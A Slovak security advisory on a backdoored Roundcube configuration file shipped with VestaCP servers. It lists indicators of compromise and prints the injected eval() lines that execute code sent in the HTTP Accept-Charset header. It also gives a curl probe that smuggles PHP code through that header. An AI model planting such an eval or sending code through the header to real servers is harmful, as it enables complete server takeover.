Bezpečnostné varovanie V20180614-01
Dôležitosť | Kritická |
Klasifikácia | Neutajované/TLP GREEN |
CVSS Skóre |
9.0 |
Identifikátor |
VestaCP Roundcube Remote Code Execution Vulnerability |
Popis |
Od nášho partnera sme získali neverejnú informáciu o kritickej bezpečnostnej zraniteľnosti vo VestaCP serveroch, nainštalovaných v období medzi decembrom 2017 a 11.04.2018. Bezpečnostná zraniteľnosť sa nachádza vo webserveri c.vestacp.com v súbore roundcube/config.inc.php a umožňuje vzdialenému útočníkovi vykonať škodlivý kód a úplné narušenie dôvernosti, integrity a dostupnosti systému. |
Dátum prvého zverejnenia varovania |
14.06.2018 |
CVE |
– |
IOC |
IOC nachádzajúce sa v roundcube súbore stiahnutom z c.vestacp.com: Debian/Ubuntu grep –n ‚/etc/roundcube/confiug.inc.php‘ –e ‚HTTP_ACCEPT_CHARSET‘ CentOS Grep –n ‚/etc/rouncubemail/coinfig.inc.php‘ –e ‚HTTP_ACCEPT_CHARSET‘ Zraniteľná časť kódu: 1. $rcmail_config[‚default_charset‘] = array(‚true‘ => 1, eval($_SERVER[‚HTTP_ACCEPT_CHARSET‘].‘;‘) => 1) ? : ‚UTF-8‘; 2. táto časť kódu sa nenachádza v CentOS inštaláciách $rcmail_config[‚force_7bit‘] = array(‚true‘ => 1, eval($rcmail_config[‚default_charset‘].‘;‘) => 1) ? : false; Kód bez zraniteľnej časti by mal vyzerať: 1. $rcmail_config[‚default_charset‘] = ‚UTF-8‘; 2. $rcmail_config[‚force_7bit‘] = false; Príklad sieťovej detekcie zraniteľnej inštalácie: curl –header „Accept-Charset: echo ‚roundcube config vulnerable‘.PHP_EOL;exit“ http://hostname.or.ip/webmail V prípade, ak je server zraniteľný, vráti odpoveď „roundcube config vulnerable“. |
Zasiahnuté systémy |
VestaCP verzie staršie ako 0.9.8-21 |
Následky |
Vykonanie škodlivého kódu a úplné narušenie dôvernosti, integrity a dostupnosti systému |
Odporúčania |
Administrátorom odporúčame bezodkladne vykonať aktualizáciu zasiahnutých systémov |
Zdroje |
Neverejné |
« Späť na zoznam